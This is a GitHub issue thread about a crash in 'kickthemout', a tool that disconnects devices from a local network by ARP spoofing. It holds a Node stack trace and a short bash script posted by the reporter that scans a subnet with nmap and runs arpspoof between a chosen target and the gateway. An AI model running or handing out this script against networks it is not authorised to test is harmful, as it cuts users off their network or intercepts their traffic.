### ISSUE TITLE
Cannot read property 'split' of undefined

### ISSUE THREAD

**Issue by lukalafaye** [roccomuso/kickthemout#12]
I'm running Ubuntu 16.04 in a crouton chroot on my chromebook. Node version is `14.4.0`.

```
  ✓ Running as root
  ✓ Internet connection.

? What to do? Start KickThemOut
? Select the network Interface: wlan0
  Scanning LAN.. |
  ✓ Gateway undefined has 8 hosts up

? Choose an option: Kick ALL off
  ✓ Attack running...


? Choose: (Use arrow keys)
❯ Pause the attack 
  ──────────────
  Stop and Exit
 
/home/iminds/Documents/kickthemout/node_modules/arpjs/lib/packet.js:15
  var ipArr = ipAddr.split('.')
                     ^

TypeError: Cannot read property 'split' of undefined
    at ipToArr (/home/iminds/Documents/kickthemout/node_modules/arpjs/lib/packet.js:15:22)
    at /home/iminds/Documents/kickthemout/node_modules/arpjs/lib/packet.js:90:20
    at extractMac (/home/iminds/Documents/kickthemout/node_modules/arpjs/node_modules/getmac/out/lib/getmac.js:39:14)
    at /home/iminds/Documents/kickthemout/node_modules/arpjs/node_modules/getmac/out/lib/getmac.js:48:16
    at ChildProcess.exithandler (child_process.js:294:7)
    at ChildProcess.emit (events.js:315:20)
    at maybeClose (internal/child_process.js:1051:16)
    at Socket.<anonymous> (internal/child_process.js:442:11)
    at Socket.emit (events.js:315:20)
    at Pipe.<anonymous> (net.js:670:12)
```

**Comment by lukalafaye** [comment]
Please help!

**Comment by roccomuso** [comment]
What OS?
what is node version?

**Comment by lukalafaye** [comment]
Updated my post. I made my own bash script anyways:

```bash
#!/usr/bin/env bash

sudo apt-get install -s dsniff nmap >/dev/null

clear

echo -n ">>> Default gateway's IPv4 (e.g.: 192.168.20.1): "
read HOST

INTERFACE=$(ip -o route get ${HOST} | perl -nle 'if ( /dev\s+(\S+)/ ) {print $1}')
echo "Wireless network interface set to ${INTERFACE}. List of hosts:"

sudo nmap -sn ${HOST}/24 | grep ${HOST:0:3} | cut -c 21-

# nmap -sn -> Disable port scanning. Host discovery only.

# | grep ${HOST:0:3} -> Selects lines containing the 1st three
# digits of the HOST's IPv4.

# | cut -c 21- -> Removes first 21 characters from each line.

echo -n ">>> Target's IPv4 (e.g. 192.168.20.18): "
read TARGET

sudo arpspoof -i ${INTERFACE} -t ${TARGET} -r ${HOST}
```

**Comment by roccomuso** [comment]
we updated the repo with the package-lock.json that shoul lock dependencies.

Reopen in case the issue persist
